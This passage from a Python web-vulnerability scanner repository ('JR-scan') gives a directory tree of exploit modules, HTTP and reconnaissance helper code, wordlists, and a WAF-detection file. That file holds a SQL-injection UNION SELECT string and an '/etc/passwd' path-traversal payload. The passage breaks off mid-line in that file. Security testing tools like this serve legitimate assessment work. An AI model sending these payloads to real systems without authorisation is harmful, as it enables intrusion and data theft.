├── AWVS_Check ├── AWVS.py └── __pycache__ │ ├── AWVS.cpython-37.pyc │ └── AWVS.cpython-38.pyc ├── Information_Scan ├── Requests.py ├── __pycache__ │ ├── Requests.cpython-37.pyc │ ├── Requests.cpython-38.pyc │ ├── common.cpython-37.pyc │ ├── common.cpython-38.pyc │ ├── iscdn.cpython-37.pyc │ ├── random_header.cpython-37.pyc │ ├── random_header.cpython-38.pyc │ ├── url.cpython-37.pyc │ ├── url.cpython-38.pyc │ ├── verify.cpython-37.pyc │ ├── verify.cpython-38.pyc │ ├── waf.cpython-37.pyc │ ├── waf.cpython-38.pyc │ ├── web_info.cpython-37.pyc │ └── web_info.cpython-38.pyc ├── common.py ├── data │ ├── GeoLite2-ASN.mmdb │ ├── GeoLite2-City.mmdb │ ├── apps.json │ ├── apps.txt │ └── path │ │ ├── cdn_servers.txt │ │ ├── dir.txt │ │ ├── next_sub_full.txt │ │ ├── user-agents.txt │ │ └── wydomain.csv ├── plugins │ ├── ActiveReconnaissance │ │ ├── __pycache__ │ │ │ ├── active.cpython-37.pyc │ │ │ ├── check_waf.cpython-37.pyc │ │ │ ├── check_waf.cpython-38.pyc │ │ │ ├── crawl.cpython-37.pyc │ │ │ ├── osdetect.cpython-37.pyc │ │ │ └── osdetect.cpython-38.pyc │ │ ├── check_waf.py │ │ ├── osdetect.py │ │ └── robots.py │ ├── InformationGathering │ │ ├── __pycache__ │ │ │ ├── geoip.cpython-37.pyc │ │ │ ├── geoip.cpython-38.pyc │ │ │ └── js_leaks.cpython-37.pyc │ │ └── geoip.py │ ├── PassiveReconnaissance │ │ ├── __pycache__ │ │ │ ├── ip_history.cpython-37.pyc │ │ │ ├── reverse_domain.cpython-37.pyc │ │ │ ├── reverse_domain.cpython-38.pyc │ │ │ ├── sub_domain.cpython-37.pyc │ │ │ ├── sub_domain.cpython-38.pyc │ │ │ ├── virustotal.cpython-37.pyc │ │ │ ├── wappalyzer.cpython-37.pyc │ │ │ └── wappalyzer.cpython-38.pyc │ │ ├── ip_history.py │ │ ├── reverse_domain.py │ │ ├── sub_domain.py │ │ └── wappalyzer.py │ └── Scanning │ │ ├── __pycache__ │ │ ├── async_scan.cpython-37.pyc │ │ ├── async_scan.cpython-38.pyc │ │ ├── check_target.cpython-37.pyc │ │ ├── check_target.cpython-38.pyc │ │ ├── port_scan.cpython-37.pyc │ │ └── port_scan.cpython-38.pyc │ │ ├── async_scan.py │ │ ├── check_target.py │ │ └── port_scan.py ├── random_header.py ├── url.py ├── verify.py ├── waf.py └── web_info.py ├── JR.py ├── POC_Scan ├── __pycache__ │ ├── main.cpython-37.pyc │ ├── main.cpython-38.pyc │ ├── pocdb.cpython-37.pyc │ └── pocdb.cpython-38.pyc ├── cms │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── cmsmain.cpython-37.pyc │ │ └── cmsmain.cpython-38.pyc │ ├── cmsmain.py │ ├── dedecms │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── __init__.cpython-38.pyc │ │ │ ├── dedecms_download_redirect.cpython-37.pyc │ │ │ ├── dedecms_download_redirect.cpython-38.pyc │ │ │ ├── dedecms_error_trace_disclosure.cpython-37.pyc │ │ │ ├── dedecms_error_trace_disclosure.cpython-38.pyc │ │ │ ├── dedecms_recommend_sqli.cpython-37.pyc │ │ │ ├── dedecms_recommend_sqli.cpython-38.pyc │ │ │ ├── dedecms_search_typeArr_sqli.cpython-37.pyc │ │ │ ├── dedecms_search_typeArr_sqli.cpython-38.pyc │ │ │ ├── dedecms_version.cpython-37.pyc │ │ │ └── dedecms_version.cpython-38.pyc │ │ ├── dedecms_download_redirect.py │ │ ├── dedecms_error_trace_disclosure.py │ │ ├── dedecms_recommend_sqli.py │ │ ├── dedecms_search_typeArr_sqli.py │ │ └── dedecms_version.py │ ├── discuz │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── __init__.cpython-38.pyc │ │ │ ├── discuz_focus_flashxss.cpython-37.pyc │ │ │ ├── discuz_focus_flashxss.cpython-38.pyc │ │ │ ├── discuz_forum_message_ssrf.cpython-37.pyc │ │ │ ├── discuz_forum_message_ssrf.cpython-38.pyc │ │ │ ├── discuz_plugin_ques_sqli.cpython-37.pyc │ │ │ ├── discuz_plugin_ques_sqli.cpython-38.pyc │ │ │ ├── discuz_x25_path_disclosure.cpython-37.pyc │ │ │ └── discuz_x25_path_disclosure.cpython-38.pyc │ │ ├── discuz_focus_flashxss.py │ │ ├── discuz_forum_message_ssrf.py │ │ ├── discuz_plugin_ques_sqli.py │ │ └── discuz_x25_path_disclosure.py │ ├── joomla │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── __init__.cpython-38.pyc │ │ │ ├── joomla_com_docman_lfi.cpython-37.pyc │ │ │ ├── joomla_com_docman_lfi.cpython-38.pyc │ │ │ ├── joomla_index_list_sqli.cpython-37.pyc │ │ │ └── joomla_index_list_sqli.cpython-38.pyc │ │ ├── joomla_com_docman_lfi.py │ │ └── joomla_index_list_sqli.py │ ├── phpcms │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── __init__.cpython-38.pyc │ │ │ ├── phpcms_authkey_disclosure.cpython-37.pyc │ │ │ ├── phpcms_authkey_disclosure.cpython-38.pyc │ │ │ ├── phpcms_digg_add_sqli.cpython-37.pyc │ │ │ ├── phpcms_digg_add_sqli.cpython-38.pyc │ │ │ ├── phpcms_flash_upload_sqli.cpython-37.pyc │ │ │ ├── phpcms_flash_upload_sqli.cpython-38.pyc │ │ │ ├── phpcms_product_code_exec.cpython-37.pyc │ │ │ ├── phpcms_product_code_exec.cpython-38.pyc │ │ │ ├── phpcms_v961_fileread.cpython-37.pyc │ │ │ ├── phpcms_v961_fileread.cpython-38.pyc │ │ │ ├── phpcms_v96_sqli.cpython-37.pyc │ │ │ ├── phpcms_v96_sqli.cpython-38.pyc │ │ │ ├── phpcms_v9_flash_xss.cpython-37.pyc │ │ │ └── phpcms_v9_flash_xss.cpython-38.pyc │ │ ├── phpcms_authkey_disclosure.py │ │ ├── phpcms_digg_add_sqli.py │ │ ├── phpcms_flash_upload_sqli.py │ │ ├── phpcms_product_code_exec.py │ │ ├── phpcms_v961_fileread.py │ │ ├── phpcms_v96_sqli.py │ │ └── phpcms_v9_flash_xss.py │ ├── phpmyadmin │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── __init__.cpython-38.pyc │ │ │ ├── phpmyadmin_setup_lfi.cpython-37.pyc │ │ │ └── phpmyadmin_setup_lfi.cpython-38.pyc │ │ └── phpmyadmin_setup_lfi.py │ ├── phpok │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── __init__.cpython-38.pyc │ │ │ ├── phpok_api_param_sqli.cpython-37.pyc │ │ │ ├── phpok_api_param_sqli.cpython-38.pyc │ │ │ ├── phpok_remote_image_getshell.cpython-37.pyc │ │ │ ├── phpok_remote_image_getshell.cpython-38.pyc │ │ │ ├── phpok_res_action_control_filedownload.cpython-37.pyc │ │ │ └── phpok_res_action_control_filedownload.cpython-38.pyc │ │ ├── phpok_api_param_sqli.py │ │ ├── phpok_remote_image_getshell.py │ │ └── phpok_res_action_control_filedownload.py │ ├── phpstudy │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── __init__.cpython-38.pyc │ │ │ ├── phpstudy_backdoor.cpython-37.pyc │ │ │ ├── phpstudy_backdoor.cpython-38.pyc │ │ │ ├── phpstudy_phpmyadmin_defaultpwd.cpython-37.pyc │ │ │ └── phpstudy_probe.cpython-37.pyc │ │ └── phpstudy_backdoor.py │ ├── sangfor │ │ ├── __pycache__ │ │ │ └── sanfor_edr.cpython-38.pyc │ │ └── sanfor_edr.py │ ├── tongda_oa │ │ ├── __pycache__ │ │ │ └── tongdaRCE.cpython-38.pyc │ │ └── tongdaRCE.py │ ├── weaver_oa │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── __init__.cpython-38.pyc │ │ │ ├── weaver_oa_db_disclosure.cpython-37.pyc │ │ │ ├── weaver_oa_db_disclosure.cpython-38.pyc │ │ │ ├── weaver_oa_download_sqli.cpython-37.pyc │ │ │ ├── weaver_oa_download_sqli.cpython-38.pyc │ │ │ ├── weaver_oa_filedownload.cpython-37.pyc │ │ │ └── weaver_oa_filedownload.cpython-38.pyc │ │ ├── weaver_oa_db_disclosure.py │ │ ├── weaver_oa_download_sqli.py │ │ └── weaver_oa_filedownload.py │ └── wordpress │ │ ├── __init__.py │ │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── wordpress_admin_ajax_filedownload.cpython-37.pyc │ │ ├── wordpress_admin_ajax_filedownload.cpython-38.pyc │ │ ├── wordpress_display_widgets_backdoor.cpython-37.pyc │ │ ├── wordpress_display_widgets_backdoor.cpython-38.pyc │ │ ├── wordpress_plugin_ShortCode_lfi.cpython-37.pyc │ │ ├── wordpress_plugin_ShortCode_lfi.cpython-38.pyc │ │ ├── wordpress_plugin_azonpop_sqli.cpython-37.pyc │ │ ├── wordpress_plugin_azonpop_sqli.cpython-38.pyc │ │ ├── wordpress_plugin_mailpress_rce.cpython-37.pyc │ │ ├── wordpress_plugin_mailpress_rce.cpython-38.pyc │ │ ├── wordpress_restapi_sqli.cpython-37.pyc │ │ ├── wordpress_restapi_sqli.cpython-38.pyc │ │ ├── wordpress_url_redirect.cpython-37.pyc │ │ ├── wordpress_url_redirect.cpython-38.pyc │ │ ├── wordpress_woocommerce_code_exec.cpython-37.pyc │ │ └── wordpress_woocommerce_code_exec.cpython-38.pyc │ │ ├── wordpress_admin_ajax_filedownload.py │ │ ├── wordpress_display_widgets_backdoor.py │ │ ├── wordpress_plugin_ShortCode_lfi.py │ │ ├── wordpress_plugin_azonpop_sqli.py │ │ ├── wordpress_plugin_mailpress_rce.py │ │ ├── wordpress_restapi_sqli.py │ │ ├── wordpress_url_redirect.py │ │ └── wordpress_woocommerce_code_exec.py ├── information │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── apache_server_status_disclosure.cpython-37.pyc │ │ ├── apache_server_status_disclosure.cpython-38.pyc │ │ ├── crossdomain_find.cpython-37.pyc │ │ ├── crossdomain_find.cpython-38.pyc │ │ ├── git_check.cpython-37.pyc │ │ ├── git_check.cpython-38.pyc │ │ ├── informationmain.cpython-37.pyc │ │ ├── informationmain.cpython-38.pyc │ │ ├── jetbrains_ide_workspace_disclosure.cpython-37.pyc │ │ ├── jetbrains_ide_workspace_disclosure.cpython-38.pyc │ │ ├── jsp_conf_find.cpython-37.pyc │ │ ├── jsp_conf_find.cpython-38.pyc │ │ ├── options_method.cpython-37.pyc │ │ ├── options_method.cpython-38.pyc │ │ ├── robots_find.cpython-37.pyc │ │ ├── robots_find.cpython-38.pyc │ │ ├── springboot_api.cpython-37.pyc │ │ ├── springboot_api.cpython-38.pyc │ │ ├── svn_check.cpython-37.pyc │ │ └── svn_check.cpython-38.pyc │ ├── apache_server_status_disclosure.py │ ├── crossdomain_find.py │ ├── git_check.py │ ├── informationmain.py │ ├── jetbrains_ide_workspace_disclosure.py │ ├── jsp_conf_find.py │ ├── options_method.py │ ├── robots_find.py │ ├── springboot_api.py │ └── svn_check.py ├── main.py ├── pocdb.py └── system │ ├── __init__.py │ ├── __pycache__ │ ├── __init__.cpython-37.pyc │ ├── __init__.cpython-38.pyc │ ├── systemmain.cpython-37.pyc │ └── systemmain.cpython-38.pyc │ ├── iis │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── iis_webdav_rce.cpython-37.pyc │ │ └── iis_webdav_rce.cpython-38.pyc │ └── iis_webdav_rce.py │ ├── nginx │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── multi_fastcgi_code_exec.cpython-37.pyc │ │ └── multi_fastcgi_code_exec.cpython-38.pyc │ └── multi_fastcgi_code_exec.py │ ├── php │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── php_expose_disclosure.cpython-37.pyc │ │ ├── php_expose_disclosure.cpython-38.pyc │ │ ├── php_fastcgi_read.cpython-37.pyc │ │ └── php_fastcgi_read.cpython-38.pyc │ ├── php_expose_disclosure.py │ └── php_fastcgi_read.py │ ├── ssh │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── libssh_bypass_auth.cpython-37.pyc │ │ └── libssh_bypass_auth.cpython-38.pyc │ └── libssh_bypass_auth.py │ ├── systemmain.py │ ├── tomcat │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── tomcat_Ajp_lfi.cpython-37.pyc │ │ ├── tomcat_Ajp_lfi.cpython-38.pyc │ │ ├── tomcat_put_exec.cpython-37.pyc │ │ ├── tomcat_put_exec.cpython-38.pyc │ │ └── tomcat_weak_pass.cpython-37.pyc │ ├── tomcat_Ajp_lfi.py │ └── tomcat_put_exec.py │ ├── weblogic │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── weblogic_interface_disclosure.cpython-37.pyc │ │ ├── weblogic_interface_disclosure.cpython-38.pyc │ │ ├── weblogic_ssrf.cpython-37.pyc │ │ ├── weblogic_ssrf.cpython-38.pyc │ │ ├── weblogic_weak_pass.cpython-37.pyc │ │ ├── weblogic_ws_utc_xxe.cpython-37.pyc │ │ ├── weblogic_ws_utc_xxe.cpython-38.pyc │ │ ├── weblogic_xmldecoder_exec.cpython-37.pyc │ │ └── weblogic_xmldecoder_exec.cpython-38.pyc │ ├── weblogic_interface_disclosure.py │ ├── weblogic_ssrf.py │ ├── weblogic_ws_utc_xxe.py │ └── weblogic_xmldecoder_exec.py │ └── windows │ ├── 0708detector.exe │ ├── RDP_CodeExecution.py │ ├── __pycache__ │ ├── RDP_CodeExecution.cpython-37.pyc │ ├── RDP_CodeExecution.cpython-38.pyc │ ├── smb_code_execution.cpython-37.pyc │ └── smb_code_execution.cpython-38.pyc │ └── smb_code_execution.py ├── README.md ├── __pycache__ ├── report.cpython-37.pyc └── report.cpython-38.pyc ├── images ├── dbs.png ├── image ├── port.png ├── url.png ├── vuln.png ├── 启动.png ├── 子域名.png └── 整站.png ├── lib ├── __pycache__ │ ├── active.cpython-37.pyc │ ├── active.cpython-38.pyc │ ├── bcolors.cpython-37.pyc │ ├── bcolors.cpython-38.pyc │ ├── cli_output.cpython-37.pyc │ ├── cli_output.cpython-38.pyc │ ├── enter.cpython-37.pyc │ ├── enter.cpython-38.pyc │ ├── setting.cpython-37.pyc │ ├── setting.cpython-38.pyc │ ├── sqldb.cpython-37.pyc │ └── sqldb.cpython-38.pyc ├── active.py ├── bcolors.py ├── cli_output.py ├── enter.py ├── setting.py └── sqldb.py ├── report.py ├── report ├── bootstrap.min.css ├── en.js ├── fonts │ ├── element-icons.ttf │ └── element-icons.woff ├── index.css ├── index.js ├── report.htm └── vue.min.js ├── requirements.txt ├── result.db └── scan_20201012192034.html /AWVS_Check/__pycache__/AWVS.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/AWVS_Check/__pycache__/AWVS.cpython-37.pyc -------------------------------------------------------------------------------- /AWVS_Check/__pycache__/AWVS.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/AWVS_Check/__pycache__/AWVS.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/Requests.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib3 3 | import hashlib 4 | import random 5 | import re 6 | import ssl 7 | import socks 8 | import socket 9 | from Information_Scan.random_header import get_ua 10 | from lib.setting import TIMEOUT, COOKIE, SOCKS5 11 | 12 | def verify(url): #判断是不是https 并返回携带协议的url 13 | if not re.search('http:|https:', url): 14 | url = 'http://' + url 15 | return url 16 | 17 | 18 | class Requests: 19 | def __init__(self): 20 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) #忽略警告 HTTPS请求不支持证书验证 21 | requests.packages.urllib3.disable_warnings() #忽略警告 22 | 23 | self.timeout = TIMEOUT #延迟 24 | self.session = requests.Session() #下次请求自动带上请求参数 25 | self.headers = get_ua() #自定义请求头 26 | 27 | if COOKIE == 'random': 28 | plain = ''.join([random.choice('0123456789') for _ in range(8)]) #随机选8个 37247698 29 | md5sum = hashlib.md5() #创建hashlib的md5对象 30 | md5sum.update(plain.encode('utf-8')) #将字符串载入到md5对象中,获得md5算法加密。 31 | md5 = md5sum.hexdigest() #通过hexdigest()方法,获得new_md5对象的16进制md5显示。 32 | self.headers.update({'Cookie': 'SESSION=' + md5}) #更新headers头信息 33 | else: 34 | self.headers.update(COOKIE) #更新headers头信息 35 | 36 | if SOCKS5: #代理 37 | ip, port = SOCKS5 38 | socks.set_default_proxy(socks.SOCKS5, ip, port) 39 | socket.socket = socks.socksocket #建立连接 40 | 41 | def scan(self, url): 42 | url = verify(url) #https://www.baidu.com http://www.baidu.com 43 | try: 44 | r = self.session.get(url, 45 | timeout=self.timeout, 46 | headers=self.headers, 47 | verify=False, #证书 48 | stream=True, 49 | allow_redirects=False) #重定向 50 | return r #连接信息 51 | 52 | except: 53 | pass 54 | 55 | 56 | def get(self, url): 57 | url = verify(url) #判断是不是https 58 | try: 59 | r = self.session.get(url, timeout=self.timeout, headers=self.headers, verify=False, allow_redirects=False) #长连接 60 | return r #返回长连接信息 61 | except: 62 | pass 63 | 64 | 65 | def post(self, url, data): 66 | url = verify(url) #https://www.baidu.com 67 | try: 68 | r = self.session.post(url, 69 | data=data, 70 | timeout=self.timeout, 71 | headers=self.headers, 72 | verify=False, 73 | allow_redirects=False) #allow_redirects=False 不准重定向 74 | return r 75 | except: 76 | pass 77 | 78 | def request(self, url, method, data=None, headers=None): #发起请求 79 | url = verify(url) #http|https分析后的url 80 | try: 81 | if method == 'get': 82 | r = self.session.get(url, timeout=self.timeout, headers=headers, verify=False, allow_redirects=True) #verify处理不信任的证书 83 | return r 84 | else: 85 | r = self.session.post(url, 86 | data=data, 87 | timeout=self.timeout, 88 | headers=headers, 89 | verify=False, 90 | allow_redirects=False) 91 | return r 92 | except: 93 | pass 94 | 95 | -------------------------------------------------------------------------------- /Information_Scan/__pycache__/Requests.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/Requests.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/Requests.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/Requests.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/common.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/common.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/common.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/common.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/iscdn.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/iscdn.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/random_header.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/random_header.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/random_header.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/random_header.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/url.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/url.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/url.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/url.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/verify.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/verify.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/verify.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/verify.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/waf.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/waf.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/waf.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/waf.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/web_info.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/web_info.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/web_info.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/web_info.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/common.py: -------------------------------------------------------------------------------- 1 | from Information_Scan.web_info import web_info 2 | from lib.sqldb import Sqldb 3 | from Information_Scan.verify import verify_https 4 | from Information_Scan.plugins.Scanning.port_scan import ScanPort 5 | from Information_Scan.plugins.Scanning.async_scan import DirScan 6 | from Information_Scan.plugins.PassiveReconnaissance.sub_domain import sub_domain 7 | from Information_Scan.url import parse_host 8 | 9 | def web_save(webinfo, dbname): 10 | Sqldb(dbname).get_webinfo(webinfo) #保存到数据库 11 | 12 | def start(target, dbname): 13 | title = 'test' 14 | url = verify_https(target) #判断是否跳转并获得最终url http+url还是https+url 15 | 16 | data, apps, title = web_info(url) #返回目标信息 数据 网站标题 17 | 18 | host = parse_host(url) 19 | subip = sub_domain(host).execution() # 子域名查询 20 | 21 | open_port = ScanPort(url, dbname) #端口信息 22 | open_port.pool() 23 | 24 | dirscan = DirScan(dbname, url) #实例化 25 | dirscan.pool() #网站信息探测,保存到数据库 26 | 27 | web_save(data, dbname) #操作系统各种信息 数据库名字 28 | 29 | if __name__ == "__main__": 30 | start('http://127.0.0.1') -------------------------------------------------------------------------------- /Information_Scan/data/GeoLite2-ASN.mmdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/data/GeoLite2-ASN.mmdb -------------------------------------------------------------------------------- /Information_Scan/data/GeoLite2-City.mmdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/data/GeoLite2-City.mmdb -------------------------------------------------------------------------------- /Information_Scan/data/path/cdn_servers.txt: -------------------------------------------------------------------------------- 1 | chinacache.net 2 | lxdns.com 3 | fastcdn.cn 4 | globalcdn.cn 5 | lxcdn.com 6 | aicdn.com 7 | cdn20.com 8 | fastwebcdn.com 9 | cloudcdn.net 10 | akamai-staging.net 11 | akamaized.net 12 | akamai.net 13 | cloudfront.net 14 | amazonaws.com 15 | azioncdn.net 16 | cachefly.net 17 | cdn77.net 18 | cdn77.org 19 | cdnetworks.com 20 | gccdn.net 21 | cdnify.io 22 | cdnsun.net 23 | cdnvideo.ru 24 | wscloudcdn.com 25 | edgecastcdn.net 26 | fastly.net 27 | qianxun.com 28 | hwcdn.net 29 | incapdns.net 30 | internapcdn.net 31 | jdcdn.com 32 | kxcdn.com 33 | Leaseweb 34 | lswcdn.net 35 | fpbns.net. 36 | footprint.net 37 | llnwd.net 38 | netdna-cdn.com 39 | ngenix.net 40 | ccgslb.com.cn 41 | mwcloudcdn.com 42 | speedcdns.com 43 | skyparkcdn.net 44 | ourglb0.com 45 | bitgravity.com 46 | azureedge.net 47 | anankecdn.com.br 48 | presscdn.com 49 | telefonica.com 50 | alikunlun.com 51 | ourwebcdn.com 52 | aliyuncs.com 53 | aliyun-inc.com 54 | cdn.dnsv1.com 55 | cdntip.com 56 | alicdn.com 57 | cdn20.info 58 | acadn.com 59 | fastcdn.com 60 | tcdn.qq.com 61 | dayugslb.com -------------------------------------------------------------------------------- /Information_Scan/data/path/dir.txt: -------------------------------------------------------------------------------- 1 | /home 2 | /con 3 | /su 4 | /user 5 | /static 6 | /stat 7 | /more 8 | /bhan 9 | /pub 10 | /repair 11 | /2007 12 | /2009 13 | /2004 14 | /app 15 | /temple 16 | /images 17 | /templete 18 | /site 19 | /cret 20 | /welcome.html 21 | /aaa.txt 22 | /aab.txt 23 | /aac.txt 24 | /aad.txt 25 | /aae.txt 26 | /aaf.txt 27 | /aag.txt 28 | /aah.txt 29 | /jay.txt 30 | /jaz.txt 31 | /jba.txt 32 | /jbb.txt 33 | /jbc.txt 34 | /jbd.txt 35 | /index.php 36 | /default.html 37 | -------------------------------------------------------------------------------- /Information_Scan/plugins/ActiveReconnaissance/__pycache__/active.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/active.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/ActiveReconnaissance/__pycache__/check_waf.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/check_waf.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/ActiveReconnaissance/__pycache__/check_waf.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/check_waf.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/ActiveReconnaissance/__pycache__/crawl.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/crawl.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/ActiveReconnaissance/__pycache__/osdetect.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/osdetect.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/ActiveReconnaissance/__pycache__/osdetect.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/osdetect.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/ActiveReconnaissance/check_waf.py: -------------------------------------------------------------------------------- 1 | import re 2 | from Information_Scan.Requests import Requests 3 | from Information_Scan.waf import WAF_RULE 4 | 5 | ''' 6 | WAF 检测思路 7 | 8 | 发送Payload触发WAF拦截机制,根据响应头字段或者响应体拦截内容判断WAF 9 | ''' 10 | 11 | payload = ( 12 | "/index.php?id=1 AND 1=1 UNION ALL SELECT 1,NULL,'',table_name FROM information_schema.tables WHERE 2>1--/**/", 13 | "/../../../etc/passwd", "/.git/", "/phpinfo.php") 14 | 15 | 16 | def verify(headers, content): #检测有无WAF 17 | for i in WAF_RULE: 18 | name, method, position, regex = i.split('|') #提取触发waf的名字 方式 服务 被什么拦截 19 | if method == 'headers': 20 | if headers.get(position) is 